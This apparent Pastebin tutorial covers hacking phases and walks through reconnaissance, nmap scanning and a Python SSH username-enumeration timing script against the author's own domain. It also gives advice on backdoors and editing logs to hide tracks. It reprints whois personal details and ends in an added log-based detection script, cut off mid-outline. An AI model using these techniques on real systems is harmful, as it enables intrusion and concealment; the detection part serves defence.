Untitled

a guest
Sep 24th, 2016
A hacker can get a foothold in a network through different techniques and for different reasons. A network may be targeted by a hacker for whatever reason he has, in which case it is a target of choice, or it may simply be a target of opportunity that he found through a random scan.
-“If a network is not a target of choice, that does not mean it is safe, because it is just a matter of time until it becomes a target of opportunity.”-

Usually hackers go through these well-known steps to gain access to a network:

1- Reconnaissance and foot / finger printing:- Reconnaissance is the first step of an attack, and this phase is mostly about information gathering: all the information the hacker can collect about the victim, even if it seems simple and useless. The hacker can collect this information in different ways, for example simple dumpster diving around the target's office, checking the staff's social network profiles, googling the target and noting the information he gets, or social engineering. The foot printing process then completes the step. Foot printing is mainly about studying the network, for example how devices are connected together, how many devices the network has, the infrastructure, firewalls, etc.
“This phase depends on OSINT -open source intelligence- with no direct contact with the target.”
  8.  
2- Scanning:- The attacker engages with the target for more specific details, for example open ports and running services. Let's say we find port 21 open; then with a simple telnet command we can figure out the FTP version running on the server.

3- Enumeration, gaining access and privilege escalation:- Three different processes. First, enumeration, which lets the hacker find out which accounts are valid before he tries to obtain access to them over an active connection. For example, he knows from the above processes -reconnaissance, foot printing and scanning- that there is an SSH service running on the -default- port 22; by enumerating, the hacker can tell whether a user is valid or not with a simple Python script. The next step is brute-forcing the valid account. If he succeeds in gaining access to the SSH server, he will then try privilege escalation if the brute-forced account does not have superuser power.

4- Creating a backdoor and covering tracks:- In this phase the hacker has already gained access, and he will install a rootkit or backdoor to guarantee himself free entry to the network later on, for example by creating a new user and adding it to the sudo list. The last step is covering his tracks by editing the logs to remove the entries that would expose him.
A hacker will never delete the logs outright, as that would get the network administrator's attention.

A real life example,

Let's say a hacker would like to take over ashellz.com -it's owned by me-. I will try to demonstrate the process step by step according to the above explanation.
  22.  
Reconnaissance and Foot printing:-

Using the command whois to collect public information about the target.

root@Mox:/home/allamoox# whois ashellz.com
Registrant domain : Goddady.com
Tech Email: allamoox@hotmail.com
Name Server: NS8015.HOSTGATOR.COM
Name Server: NS8016.HOSTGATOR.COM
Tech Name: mahmoud allam
Tech Organization: aLLamoox
Tech Street: aol tarik shobar
Tech City: Tanta
Tech State/Province: gHARBIA
Tech Postal Code: 31111
Tech Country: EG
Tech Phone: +20.104691184

Using dig with the switch any to show all records.

root@Mox:/home/allamoox# dig ashellz.com any
  44.  
ashellz.com. 14385 IN A 192.185.16.67
ashellz.com. 86385 IN SOA ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com. 2016091826 86400 7200 3600000 86400
ashellz.com. 14385 IN MX 0 mail.ashellz.com.
ashellz.com. 14385 IN TXT "v=spf1 a mx include:websitewelcome.com ~all"
ashellz.com. 86385 IN NS ns8016.hostgator.com.
ashellz.com. 86385 IN NS ns8015.hostgator.com.
  51.  
Scanning:-

We will use nmap with the switch -O to detect the OS and -sS so the connection is closed before the three-way handshake completes -Passive scan-.
  55.  
root@Mox:/home/allamoox# nmap -O -sS ashellz.com
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
25/tcp filtered smtp
26/tcp open rsftp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2222/tcp open EtherNetIP-1
3306/tcp open mysql
8080/tcp open http-proxy
8443/tcp open https-alt
Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux 2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 - 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%)
  80.  
root@Mox:/home/allamoox# telnet private.ashellz.com 22
Trying 158.69.197.45...
Connected to private.ashellz.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6

Simple search will let us know that this

Enumeration:-
  89.  
The hacker at this point has a good idea about the target and which parts are vulnerable, and he will start enumerating valid accounts for the SSH service via a timing attack technique.

The technique depends on the time our server takes to authenticate a user, so we will use a 10kb password, which means that if the user does not exist we will get an answer from the server faster than for an existing user.

With this simple Python script we set our password to roughly 10KB and enter the username we want to check manually.
  95.  
#Including the paramiko library
import paramiko
#Including the time library
import time

#Asking for the required username to be checked
user = raw_input("user: ")
#Supplying the password as the letter A repeated 25000 times
p = 'A' * 25000
ssh = paramiko.SSHClient()
starttime = time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    #Opening an SSH connection to the ashellz.com server with the chosen user and the big 25000-letter password
    ssh.connect('192.185.16.67', username=user, password=p)
except Exception:
    #Authentication fails either way; the time it took the server to reject it is the signal
    endtime = time.clock()
    total = endtime - starttime
    print(total)
  116.  
Now we get a few valid accounts such as (root, allamoox, allam, test)
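On the server side each of those probes is just one failed login for a different username from the same source, which is the pattern to alert on. The script below is an added example, not part of the original paste: it runs over constructed sshd auth.log lines (the usernames reuse the ones listed above; the addresses and host name are made up) and reports any source that tried several distinct usernames. The threshold of four distinct usernames is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines in syslog format.
AUTH_LOG = """\
Sep 24 10:01:02 web sshd[2011]: Invalid user admin from 203.0.113.5 port 50212
Sep 24 10:01:02 web sshd[2011]: Failed password for invalid user admin from 203.0.113.5 port 50212 ssh2
Sep 24 10:01:04 web sshd[2013]: Failed password for root from 203.0.113.5 port 50213 ssh2
Sep 24 10:01:06 web sshd[2015]: Failed password for allamoox from 203.0.113.5 port 50214 ssh2
Sep 24 10:01:08 web sshd[2017]: Invalid user oracle from 203.0.113.5 port 50215
Sep 24 10:01:08 web sshd[2017]: Failed password for invalid user oracle from 203.0.113.5 port 50215 ssh2
Sep 24 10:01:10 web sshd[2019]: Failed password for test from 203.0.113.5 port 50216 ssh2
Sep 24 10:05:00 web sshd[2101]: Failed password for allamoox from 198.51.100.7 port 40001 ssh2
Sep 24 10:05:09 web sshd[2104]: Accepted password for allamoox from 198.51.100.7 port 40002 ssh2
"""

# sshd writes "invalid user" only when the account does not exist, so the
# optional group lets one pattern cover both existing and non-existing users.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")


def failed_logins(text):
    """Yield (source_ip, username) for every failed password line."""
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            yield m.group(2), m.group(1)


def enumeration_suspects(text, min_distinct_users=4):
    """Sources that tried at least min_distinct_users different usernames."""
    users_by_src = defaultdict(set)
    for src, user in failed_logins(text):
        users_by_src[src].add(user)
    return {src: sorted(users) for src, users in users_by_src.items()
            if len(users) >= min_distinct_users}


if __name__ == "__main__":
    for src, users in enumeration_suspects(AUTH_LOG).items():
        print("%s probed %d usernames: %s" % (src, len(users), ", ".join(users)))
```

A real deployment would add a time window and feed the result to a blocklist or SIEM rule; the legitimate user who mistyped once from 198.51.100.7 stays below the threshold.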
gaining access and privileges escalation